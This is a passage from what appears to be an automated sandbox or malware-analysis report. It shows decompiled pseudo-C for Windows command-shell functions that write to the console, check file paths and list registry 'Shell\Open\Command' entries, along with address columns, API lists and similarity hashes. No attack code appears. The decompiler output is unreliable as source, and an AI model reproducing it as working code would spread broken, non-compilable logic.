							_t101[1] = _t101[1] + E011DBED7(_t101, _t101[4]) + 1;
							E011DB6B9(_t101);
							if(_t101[1] > _t101[7]) {
								_t101[1] = _t101[1] & 0x00000000;
							}
							 *(_t101[4]) = 0;
							_t101[2] = _t101[2] & 0;
							return 0;
						}
					}
				}
				L38:
			}




















                                                    0x011db61b
                                                    0x011db625
                                                    0x011db62a
                                                    0x011db62f
                                                    0x011e983d
                                                    0x011e9840
                                                    0x011e9843
                                                    0x011e9845
                                                    0x011e984b
                                                    0x011e9850
                                                    0x011e9850
                                                    0x011e9852
                                                    0x011e9854
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e985a
                                                    0x011e985a
                                                    0x011e985a
                                                    0x011e985d
                                                    0x00000000
                                                    0x00000000
                                                    0x011e985f
                                                    0x011e9862
                                                    0x011e9864
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9864
                                                    0x011e9866
                                                    0x011e9868
                                                    0x00000000
                                                    0x011e986a
                                                    0x011e9874
                                                    0x011e987a
                                                    0x011e987d
                                                    0x011e9885
                                                    0x011e988b
                                                    0x011e988d
                                                    0x00000000
                                                    0x011e9893
                                                    0x011e9893
                                                    0x011e9896
                                                    0x011e9899
                                                    0x00000000
                                                    0x011e989f
                                                    0x011e989f
                                                    0x011e98a2
                                                    0x011e98a4
                                                    0x011e98b3
                                                    0x011e98b3
                                                    0x011e98b3
                                                    0x011e98b5
                                                    0x00000000
                                                    0x00000000
                                                    0x011e98ab
                                                    0x011e98ae
                                                    0x011e98b0
                                                    0x011e98b0
                                                    0x00000000
                                                    0x011e98b0
                                                    0x00000000
                                                    0x011e98ae
                                                    0x011e98b7
                                                    0x011e98b9
                                                    0x011e9903
                                                    0x011e9903
                                                    0x011e9908
                                                    0x011e990a
                                                    0x00000000
                                                    0x011e9910
                                                    0x00000000
                                                    0x011e9910
                                                    0x011e98bb
                                                    0x011e98bb
                                                    0x011e98be
                                                    0x011e98c4
                                                    0x011e98c4
                                                    0x011e98d4
                                                    0x011e98da
                                                    0x011e98dd
                                                    0x011e98e3
                                                    0x011e98eb
                                                    0x011e98ed
                                                    0x011e98f2
                                                    0x011e98f4
                                                    0x00000000
                                                    0x011e98f6
                                                    0x011e98f6
                                                    0x011e98f9
                                                    0x011e98fc
                                                    0x00000000
                                                    0x011e98fe
                                                    0x011e98fe
                                                    0x011e9901
                                                    0x00000000
                                                    0x011e9901
                                                    0x011e98fc
                                                    0x011e98f4
                                                    0x011e98b9
                                                    0x011e9899
                                                    0x011e988d
                                                    0x00000000
                                                    0x011e9868
                                                    0x011e9850
                                                    0x00000000
                                                    0x011db635
                                                    0x011db64b
                                                    0x011e9934
                                                    0x011e9936
                                                    0x011e9937
                                                    0x011e993c
                                                    0x011e993e
                                                    0x011e9948
                                                    0x011e9949
                                                    0x011e994e
                                                    0x011e9950
                                                    0x011e9952
                                                    0x011e9953
                                                    0x00000000
                                                    0x011e9953
                                                    0x011e9940
                                                    0x011e9940
                                                    0x011e9942
                                                    0x011e9955
                                                    0x011e9955
                                                    0x011e995b
                                                    0x011e995b
                                                    0x011e995c
                                                    0x011e9968
                                                    0x011e996e
                                                    0x011e996f
                                                    0x011e9972
                                                    0x011db6ca
                                                    0x011e9978
                                                    0x011e997a
                                                    0x011e997f
                                                    0x011e9985
                                                    0x011e998d
                                                    0x011e998d
                                                    0x011e998e
                                                    0x011e9992
                                                    0x011e9992
                                                    0x011db651
                                                    0x011db651
                                                    0x011db654
                                                    0x011db659
                                                    0x00000000
                                                    0x011db65f
                                                    0x011db65f
                                                    0x011db662
                                                    0x011db66c
                                                    0x011e9921
                                                    0x011e9929
                                                    0x011db672
                                                    0x011db67d
                                                    0x011db67d
                                                    0x011db68f
                                                    0x011db692
                                                    0x011db69d
                                                    0x011db6b3
                                                    0x011db6b3
                                                    0x011db6a4
                                                    0x011db6a7
                                                    0x011db6b2
                                                    0x011db6b2
                                                    0x011db659
                                                    0x011db64b
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                                    • _get_osfhandle.MSVCRT ref: 011E987D
                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9885
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,011E65F0,?,011E64F0), ref: 011E98C4
                                                    • _get_osfhandle.MSVCRT ref: 011E98DD
                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E98E5
                                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9968
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                    • String ID:
                                                    • API String ID: 1333215474-0
                                                    • Opcode ID: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                                    • Instruction ID: 4b6af5c88d5ffea4c74fa34773138b1681615abdef8cfce3835f756827ae972a
                                                    • Opcode Fuzzy Hash: 1f639f789ca2a11a37d29074f53759e086d6987f0845b3ae85ce0b2c057ca22a
                                                    • Instruction Fuzzy Hash: FC51C531B0070AEBDB2CEBB8D85DB6EB7E8EB14709F05452AE502D7281EB70D940CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DC923, Relevance: 10.8, APIs: 7, Instructions: 281COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E011DC923(signed short** __ecx) {
				signed short* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed short _t33;
				signed int _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed int _t38;
				void* _t39;
				signed int _t40;
				signed int _t41;
				WCHAR* _t42;
				WCHAR* _t47;
				signed int _t48;
				signed int _t49;
				void* _t54;
				long _t56;
				int _t62;
				signed short _t64;
				signed int _t69;
				signed int _t70;
				signed short* _t72;
				signed short* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				signed int _t79;
				signed char _t80;
				signed short* _t82;
				WCHAR* _t84;
				WCHAR* _t90;
				signed int _t95;
				signed short* _t107;
				signed int _t108;
				short* _t109;
				short* _t111;
				WCHAR* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				WCHAR** _t121;
				signed short* _t122;
				signed int _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				WCHAR* _t129;
				int _t130;
				signed int _t131;
				WCHAR* _t132;

				_t121 = __ecx;
				_v12 = 0x11d1f8c;
				 *0x1213cf0 = 0;
				_t82 =  *__ecx;
				_t122 = _t82;
				_t2 =  &(_t122[1]); // 0x2
				_t107 = _t2;
				do {
					_t33 =  *_t122;
					_t122 =  &(_t122[1]);
				} while (_t33 != 0);
				_t34 =  *_t82 & 0x0000ffff;
				_t124 = _t122 - _t107 >> 1;
				_t74 = _t82;
				_v20 = _t124;
				_t108 = _t34;
				if(_t34 == 0) {
					L6:
					_t35 = 0x3a;
					_v8 = _t74;
					_v24 = _t35;
					if(_t108 == _t35) {
						__eflags = _t124 - 2;
						if(_t124 <= 2) {
							goto L7;
						}
						 *_t74 = 0;
						_t24 = _t74 - 2; // -2
						_v8 = _t24;
						_t62 = SetErrorMode(0);
						_t102 =  *_t121;
						_v16 = _t62;
						_t132 = E011DD120( *_t121, 0x8000, _t82);
						__eflags = _t132 - 0xffffffff;
						if(_t132 == 0xffffffff) {
							L49:
							__eflags =  *0x11fd0dc - 4;
							_t64 = 0x3a;
							_v8 = _t74;
							 *_t74 = _t64;
							if( *0x11fd0dc != 4) {
								E011DC5A2(_t102, 0x236b, 1,  *_t121);
							} else {
								__eflags =  *0x11fd5a8;
								if( *0x11fd5a8 == 0) {
									E011DC5A2(_t102, 0x236b, 1,  *_t121);
								}
								 *0x11fd5a4 = 1;
							}
							__eflags = _t132 - 0xffffffff;
							L55:
							if(__eflags == 0) {
								L57:
								SetErrorMode(_v16);
								goto L7;
							}
							L56:
							E011DDB92(_t132);
							goto L57;
						}
						_t69 = E011E0178(_t63);
						__eflags = _t69;
						if(_t69 != 0) {
							L47:
							_t70 = E011E0178(_t69);
							__eflags = _t70;
							if(_t70 != 0) {
								goto L56;
							}
							__eflags = E011F9953(_t70, _t132);
							goto L55;
						}
						_t102 = _t132;
						_t69 = E011F9953(_t69, _t132);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L49;
						}
						goto L47;
					}
					L7:
					_t83 = 0x250;
					_t36 = E011E00B0(0x250);
					if(_t36 == 0) {
						L58:
						E011F9287(_t83);
						__imp__longjmp(0x120b8b8, 1);
						L59:
						_t125 =  *_t121;
						_t75 = 0;
						__eflags = 0;
						_t84 = _t125;
						_t29 =  &(_t84[1]); // 0x0
						_t109 = _t29;
						do {
							_t38 =  *_t84;
							_t84 =  &(_t84[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						__eflags = _t84 - _t109 >> 1 - 2;
						if(_t84 - _t109 >> 1 >= 2) {
							_t38 = 0x3a;
							__eflags = _t125[1] - _t38;
							if(_t125[1] == _t38) {
								_t125 =  &(_t125[2]);
							}
						}
						L11:
						__imp___wcsicmp(_t125, ".");
						if(_t38 == 0) {
							L39:
							_t126 =  *_t121;
							_t39 = 0x5c;
							_t40 = E011E2349(_t126, _t39);
							__eflags = _t40;
							if(_t40 == 0) {
								_t90 = _t126;
								__eflags = 0;
								_t31 =  &(_t90[1]); // 0x0
								_t111 = _t31;
								do {
									_t41 =  *_t90;
									_t90 =  &(_t90[1]);
									__eflags = _t41;
								} while (_t41 != 0);
								__eflags = _t90 - _t111 >> 1 - 2;
								if(_t90 - _t111 >> 1 != 2) {
									goto L40;
								}
								_t54 = 0x3a;
								__eflags = _t126[1] - _t54;
								if(_t126[1] == _t54) {
									L42:
									 *(_t121[6]) = 0x10;
									L17:
									_t79 = 1;
									_t129 = 0;
									_t47 =  *_t121;
									_t114 = _t47;
									while(1) {
										_t95 =  *_t114 & 0x0000ffff;
										if(_t95 == 0) {
											break;
										}
										if(_t95 == _v16) {
											L23:
											_t129 = _t114;
											L21:
											_t114 =  &(_t114[1]);
											_t79 = _t79 + 1;
											continue;
										}
										if(_t95 == _v24) {
											__eflags = _t79 - 2;
											if(_t79 != 2) {
												goto L21;
											}
											goto L23;
										}
										goto L21;
									}
									_t121[3] = _t129;
									__eflags = _t129;
									if(_t129 == 0) {
										_t129 = _t47;
									} else {
										__eflags =  *_t129;
										if( *_t129 == 0) {
											_t47 = _t129;
										} else {
											_t12 =  &(_t129[1]); // 0x2
											_t47 = _t12;
										}
									}
									_t115 = 0x2a;
									_t121[4] = _t47;
									_t48 = E011DD7D4(_t129, _t115);
									__eflags = _t48;
									if(_t48 == 0) {
										_t116 = 0x3f;
										_t49 = E011DD7D4(_t129, _t116);
										__eflags = _t49;
										if(_t49 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										L28:
										_t14 =  &(_t121[7]);
										 *_t14 = _t121[7] | 0x00000008;
										__eflags =  *_t14;
										 *0x1213cd0 = 1;
										L29:
										_t117 = 0x2e;
										_t121[5] = E011DD7D4(_t129, _t117);
										__eflags = 1;
										return 1;
									}
								}
							}
							L40:
							_t77 =  *_t121;
							_t83 = _v20 + 5 + _v20 + 5;
							_t42 = E011E00B0(_v20 + 5 + _v20 + 5);
							__eflags = _t42;
							if(_t42 == 0) {
								goto L58;
							}
							 *_t121 = _t42;
							E011E1040(_t42, _t128, _t77);
							E011E18C0( *_t121, _t128, _v12);
							goto L42;
						}
						__imp___wcsicmp(_t125, L"..");
						if(_t38 == 0) {
							goto L39;
						}
						if( *0x11fd0dc == 4) {
							__eflags =  *0x11fd5ac - 1;
							if( *0x11fd5ac == 1) {
								goto L14;
							}
							__eflags =  *0x11fd0c0 - 1;
							if( *0x11fd0c0 != 1) {
								goto L17;
							}
							 *0x11fd0c0 = _t75;
						}
						L14:
						_t80 = GetFileAttributesW( *_t121);
						if(_t80 != 0xffffffff) {
							_t56 = 0;
						} else {
							_t56 = GetLastError();
						}
						 *0x1213cf0 = _t56;
						if(_t80 != 0xffffffff) {
							__eflags = _t80 & 0x00000010;
							if((_t80 & 0x00000010) == 0) {
								goto L17;
							}
							goto L39;
						} else {
							goto L17;
						}
					}
					_t121[6] = _t36;
					_t130 = 0x5c;
					_v16 = _t130;
					if(( *_v8 & 0x0000ffff) == _t130) {
						_v12 = 0x11d1f8e;
						goto L39;
					}
					_t38 = E011E2349( *_t121, _t130);
					_t131 = _t38;
					if(_t131 == 0) {
						goto L59;
					}
					_t125 = _t131 + 2;
					_t75 = 0;
					goto L11;
				} else {
					goto L4;
					L4:
					_t72 = _t82;
					_t74 = _t82;
					_t82 =  &(_t82[1]);
					if( *_t82 != 0) {
						goto L4;
					} else {
						_t108 =  *_t72 & 0x0000ffff;
						goto L6;
					}
				}
			}





















































                                                    0x011dc92e
                                                    0x011dc930
                                                    0x011dc939
                                                    0x011dc93f
                                                    0x011dc941
                                                    0x011dc943
                                                    0x011dc943
                                                    0x011dc946
                                                    0x011dc946
                                                    0x011dc949
                                                    0x011dc94c
                                                    0x011dc951
                                                    0x011dc956
                                                    0x011dc958
                                                    0x011dc95a
                                                    0x011dc95d
                                                    0x011dc962
                                                    0x011dc975
                                                    0x011dc977
                                                    0x011dc978
                                                    0x011dc97b
                                                    0x011dc981
                                                    0x011eaff7
                                                    0x011eaffa
                                                    0x00000000
                                                    0x00000000
                                                    0x011eb002
                                                    0x011eb005
                                                    0x011eb008
                                                    0x011eb00e
                                                    0x011eb015
                                                    0x011eb01c
                                                    0x011eb024
                                                    0x011eb026
                                                    0x011eb029
                                                    0x011eb057
                                                    0x011eb057
                                                    0x011eb060
                                                    0x011eb061
                                                    0x011eb064
                                                    0x011eb067
                                                    0x011eb098
                                                    0x011eb069
                                                    0x011eb069
                                                    0x011eb070
                                                    0x011eb07b
                                                    0x011eb080
                                                    0x011eb083
                                                    0x011eb083
                                                    0x011eb0a0
                                                    0x011eb0a3
                                                    0x011eb0a3
                                                    0x011eb0ac
                                                    0x011eb0af
                                                    0x00000000
                                                    0x011eb0af
                                                    0x011eb0a5
                                                    0x011eb0a7
                                                    0x00000000
                                                    0x011eb0a7
                                                    0x011eb02d
                                                    0x011eb032
                                                    0x011eb034
                                                    0x011eb041
                                                    0x011eb043
                                                    0x011eb048
                                                    0x011eb04a
                                                    0x00000000
                                                    0x00000000
                                                    0x011eb053
                                                    0x00000000
                                                    0x011eb053
                                                    0x011eb036
                                                    0x011eb038
                                                    0x011eb03d
                                                    0x011eb03f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011eb03f
                                                    0x011dc987
                                                    0x011dc987
                                                    0x011dc98c
                                                    0x011dc993
                                                    0x011eb0ba
                                                    0x011eb0ba
                                                    0x011eb0c6
                                                    0x011eb0cc
                                                    0x011eb0cc
                                                    0x011eb0ce
                                                    0x011eb0ce
                                                    0x011eb0d0
                                                    0x011eb0d2
                                                    0x011eb0d2
                                                    0x011eb0d5
                                                    0x011eb0d5
                                                    0x011eb0d8
                                                    0x011eb0db
                                                    0x011eb0db
                                                    0x011eb0e4
                                                    0x011eb0e7
                                                    0x011eb0ef
                                                    0x011eb0f0
                                                    0x011eb0f4
                                                    0x011eb0fa
                                                    0x011eb0fa
                                                    0x011eb0f4
                                                    0x011dc9c9
                                                    0x011dc9cf
                                                    0x011dc9d9
                                                    0x011dcaf4
                                                    0x011dcaf4
                                                    0x011dcafa
                                                    0x011dcafd
                                                    0x011dcb02
                                                    0x011dcb04
                                                    0x011eb102
                                                    0x011eb104
                                                    0x011eb106
                                                    0x011eb106
                                                    0x011eb109
                                                    0x011eb109
                                                    0x011eb10c
                                                    0x011eb10f
                                                    0x011eb10f
                                                    0x011eb118
                                                    0x011eb11b
                                                    0x00000000
                                                    0x00000000
                                                    0x011eb123
                                                    0x011eb124
                                                    0x011eb128
                                                    0x011dcb3a
                                                    0x011dcb3d
                                                    0x011dca29
                                                    0x011dca2b
                                                    0x011dca2e
                                                    0x011dca30
                                                    0x011dca32
                                                    0x011dca34
                                                    0x011dca34
                                                    0x011dca3a
                                                    0x00000000
                                                    0x00000000
                                                    0x011dca40
                                                    0x011dca53
                                                    0x011dca53
                                                    0x011dca48
                                                    0x011dca48
                                                    0x011dca4b
                                                    0x00000000
                                                    0x011dca4b
                                                    0x011dca46
                                                    0x011dca4e
                                                    0x011dca51
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dca51
                                                    0x00000000
                                                    0x011dca46
                                                    0x011dca57
                                                    0x011dca5a
                                                    0x011dca5c
                                                    0x011eb13a
                                                    0x011dca62
                                                    0x011dca64
                                                    0x011dca67
                                                    0x011eb133
                                                    0x011dca6d
                                                    0x011dca6d
                                                    0x011dca6d
                                                    0x011dca6d
                                                    0x011dca67
                                                    0x011dca72
                                                    0x011dca75
                                                    0x011dca78
                                                    0x011dca7d
                                                    0x011dca7f
                                                    0x011dcaa8
                                                    0x011dcaab
                                                    0x011dcab0
                                                    0x011dcab2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dca81
                                                    0x011dca81
                                                    0x011dca81
                                                    0x011dca81
                                                    0x011dca81
                                                    0x011dca85
                                                    0x011dca8f
                                                    0x011dca91
                                                    0x011dca99
                                                    0x011dcaa0
                                                    0x011dcaa5
                                                    0x011dcaa5
                                                    0x011dca7f
                                                    0x011eb12e
                                                    0x011dcb0a
                                                    0x011dcb0d
                                                    0x011dcb12
                                                    0x011dcb15
                                                    0x011dcb1a
                                                    0x011dcb1c
                                                    0x00000000
                                                    0x00000000
                                                    0x011dcb25
                                                    0x011dcb29
                                                    0x011dcb35
                                                    0x00000000
                                                    0x011dcb35
                                                    0x011dc9e5
                                                    0x011dc9ef
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc9fc
                                                    0x011dcac8
                                                    0x011dcacf
                                                    0x00000000
                                                    0x00000000
                                                    0x011dcad5
                                                    0x011dcadc
                                                    0x00000000
                                                    0x00000000
                                                    0x011dcae2
                                                    0x011dcae2
                                                    0x011dca02
                                                    0x011dca0a
                                                    0x011dca0f
                                                    0x011dcab6
                                                    0x011dca15
                                                    0x011dca15
                                                    0x011dca15
                                                    0x011dca1b
                                                    0x011dca23
                                                    0x011dcabd
                                                    0x011dcac0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dca23
                                                    0x011dc999
                                                    0x011dc9a1
                                                    0x011dc9a2
                                                    0x011dc9ab
                                                    0x011dcaed
                                                    0x00000000
                                                    0x011dcaed
                                                    0x011dc9b5
                                                    0x011dc9ba
                                                    0x011dc9be
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc9c4
                                                    0x011dc9c7
                                                    0x00000000
                                                    0x011dc964
                                                    0x011dc964
                                                    0x011dc966
                                                    0x011dc966
                                                    0x011dc968
                                                    0x011dc96a
                                                    0x011dc970
                                                    0x00000000
                                                    0x011dc972
                                                    0x011dc972
                                                    0x00000000
                                                    0x011dc972
                                                    0x011dc970

                                                    APIs
                                                    • _wcsicmp.MSVCRT ref: 011DC9CF
                                                    • _wcsicmp.MSVCRT ref: 011DC9E5
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                    • String ID:
                                                    • API String ID: 2943530692-0
                                                    • Opcode ID: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                                    • Instruction ID: e635eb14b41ad880cde4bf3ec2172fe7cba291c3e8be8141d8583cab9848a835
                                                    • Opcode Fuzzy Hash: 7ba18b117327cd26f8e3882125109a921b07c6f96d276bba31e25228e0a99014
                                                    • Instruction Fuzzy Hash: E3912735B006129BDB3DEFBC985836ABBE1BB48314B15492DD916D72C4FB709981CBC2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F4CF0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 249registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E011F4CF0(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t38;
				int _t42;
				signed int _t44;
				signed int _t45;
				signed int _t56;
				long _t64;
				intOrPtr _t67;
				short* _t69;
				signed int _t72;
				void* _t76;
				short* _t80;
				void* _t81;
				void* _t83;
				signed int _t90;
				signed int _t92;
				void* _t98;
				signed int _t99;
				void* _t102;
				signed int _t105;
				signed int _t108;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				int _t120;
				intOrPtr* _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t113 = __edx;
				_t38 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t38 ^ _t126;
				_t81 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					__eflags =  *__edx - 0x2e;
					if( *__edx != 0x2e) {
						_t119 = E011DDF40(E011DDEF9(__edx));
						__eflags = _t119;
						if(_t119 == 0) {
							L34:
							_t42 = 1;
							L55:
							return E011E6FD0(_t42, _t81, _v8 ^ _t126, _t113, _t119, _t120);
						}
						_t44 = E011E2349(_t119, 0x20);
						__eflags = _t44;
						if(_t44 != 0) {
							__eflags = 0;
							 *_t44 = 0;
						}
						_t90 = _t119;
						_t29 = _t90 + 2; // 0x2
						_t113 = _t29;
						do {
							_t45 =  *_t90;
							_t90 = _t90 + 2;
							__eflags = _t45;
						} while (_t45 != 0);
						_t92 = _t90 - _t113 >> 1;
						_push(_t119);
						_t30 = _t92 + 0x14; // 0x12
						__eflags = _t30 - 0x104;
						if(_t30 <= 0x104) {
							E011E1040( &_v528, 0x104);
							_t113 = 0x104;
							E011E18C0( &_v528, 0x104, L"\\Shell\\Open\\Command");
							_t120 = RegOpenKeyExW(_t81,  &_v528, 0, 0x2000000,  &_v548);
							__eflags = _t120;
							if(__eflags == 0) {
								_t113 =  &_v528;
								_t95 = _t81;
								_t81 = E011F5662(_t81, _t81,  &_v528, _t119, _t120, __eflags);
								__eflags = _t81;
								if(_t81 == 0) {
									L51:
									E011DC5A2(_t95, 0x400023a5, 1, _t119);
									L52:
									E011E0040(_t81);
									L53:
									E011E0040(_t119);
									L54:
									_t42 = _t120;
									goto L55;
								}
								_t98 = _t81;
								_t36 = _t98 + 2; // 0x2
								_t113 = _t36;
								do {
									_t56 =  *_t98;
									_t98 = _t98 + 2;
									__eflags = _t56;
								} while (_t56 != 0);
								_t99 = _t98 - _t113;
								__eflags = _t99;
								_t95 = _t99 >> 1;
								if(_t99 == 0) {
									goto L51;
								}
								_push(_t81);
								_push(_t119);
								E011E25D9(L"%s=%s\r\n");
								goto L52;
							}
							E011DC5A2( &_v528, 0x400023a5, 1, _t119);
							goto L53;
						}
						_push(1);
						_push(0x400023db);
						E011DC5A2(_t92);
						E011E0040(_t119);
						_t42 = 0x7b;
						goto L55;
					}
					E011DC5A2(__ecx, 0x400023a5, 1, __edx);
					_t42 = 0x7b;
					goto L55;
				}
				_t120 = 0;
				_v540 = 0x104;
				_v536 = 0;
				_t64 = RegEnumKeyExW(__ecx, 0,  &_v528,  &_v540, 0, 0, 0, 0);
				if(_t64 != 0) {
					L32:
					_t28 = _t64 - 0x103; // -259
					asm("sbb esi, esi");
					_t120 =  ~_t28 & _t64;
					goto L54;
				}
				do {
					if(_v528 == 0x2e) {
						L30:
						if( *0x11fd544 != 0) {
							goto L34;
						}
						goto L31;
					}
					_t123 =  &_v528;
					_t9 = _t123 + 2; // 0x30
					_t102 = _t9;
					do {
						_t67 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t67 != 0);
					_t125 = _t123 - _t102 >> 1;
					_t10 = _t125 + 0x14; // 0x40
					if(_t10 > 0x104) {
						L29:
						_t120 = _v536;
						goto L30;
					}
					_t116 = 0x104;
					_t69 =  &_v528;
					while( *_t69 != 0) {
						_t69 = _t69 + 2;
						_t116 = _t116 - 1;
						if(_t116 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t105 =  ~_t116 & 0x00000104 - _t116;
					if(_t116 == 0) {
						L22:
						_t113 =  &_v528;
						_t106 = _t81;
						_t72 = E011F5662(_t81, _t81,  &_v528, _t119, _t125, 0);
						_t120 = _t125 + _t125;
						_t119 = _t72;
						if(_t120 >= 0x208) {
							E011E711D(_t72, _t81, _t106,  &_v528, _t119, _t120);
							goto L34;
						}
						 *((short*)(_t126 + _t120 - 0x20c)) = 0;
						if(_t119 == 0) {
							L28:
							E011E0040(_t119);
							goto L29;
						}
						_t108 = _t119;
						_t21 = _t108 + 2; // 0x2
						_t113 = _t21;
						do {
							_t76 =  *_t108;
							_t108 = _t108 + 2;
						} while (_t76 != 0);
						if(_t108 != _t113) {
							_push(_t119);
							_push( &_v528);
							E011E25D9(L"%s=%s\r\n");
							_t127 = _t127 + 0xc;
						}
						goto L28;
					}
					_t80 =  &(( &_v528)[_t105]);
					_t118 = 0x104 - _t105;
					if(0x104 == 0) {
						L19:
						_t80 = _t80 - 2;
						L21:
						 *_t80 = 0;
						goto L22;
					}
					_t112 = 0x7ffffffe;
					_t83 = L"\\Shell\\Open\\Command" - _t80;
					while(_t112 != 0) {
						_t119 =  *(_t83 + _t80) & 0x0000ffff;
						if(_t119 == 0) {
							break;
						}
						 *_t80 = _t119;
						_t112 = _t112 - 1;
						_t80 =  &(_t80[1]);
						_t118 = _t118 - 1;
						if(_t118 != 0) {
							continue;
						}
						L18:
						_t81 = _v532;
						goto L19;
					}
					__eflags = _t118;
					if(__eflags != 0) {
						_t81 = _v532;
						goto L21;
					}
					goto L18;
					L31:
					_v540 = 0x104;
					_t120 = _t120 + 1;
					_v536 = _t120;
					_t64 = RegEnumKeyExW(_t81, _t120,  &_v528,  &_v540, 0, 0, 0, 0);
				} while (_t64 == 0);
				goto L32;
			}










































                                                    0x011f4cf0
                                                    0x011f4cfb
                                                    0x011f4d02
                                                    0x011f4d06
                                                    0x011f4d08
                                                    0x011f4d12
                                                    0x011f4ec8
                                                    0x011f4ecc
                                                    0x011f4ef6
                                                    0x011f4ef8
                                                    0x011f4efa
                                                    0x011f4ebe
                                                    0x011f4ebe
                                                    0x011f5000
                                                    0x011f5010
                                                    0x011f5010
                                                    0x011f4f03
                                                    0x011f4f08
                                                    0x011f4f0a
                                                    0x011f4f0c
                                                    0x011f4f0e
                                                    0x011f4f0e
                                                    0x011f4f11
                                                    0x011f4f13
                                                    0x011f4f13
                                                    0x011f4f16
                                                    0x011f4f16
                                                    0x011f4f19
                                                    0x011f4f1c
                                                    0x011f4f1c
                                                    0x011f4f23
                                                    0x011f4f25
                                                    0x011f4f26
                                                    0x011f4f29
                                                    0x011f4f2e
                                                    0x011f4f5b
                                                    0x011f4f65
                                                    0x011f4f70
                                                    0x011f4f91
                                                    0x011f4f93
                                                    0x011f4f95
                                                    0x011f4fa9
                                                    0x011f4faf
                                                    0x011f4fb6
                                                    0x011f4fb8
                                                    0x011f4fba
                                                    0x011f4fe0
                                                    0x011f4fe8
                                                    0x011f4fed
                                                    0x011f4ff2
                                                    0x011f4ff7
                                                    0x011f4ff9
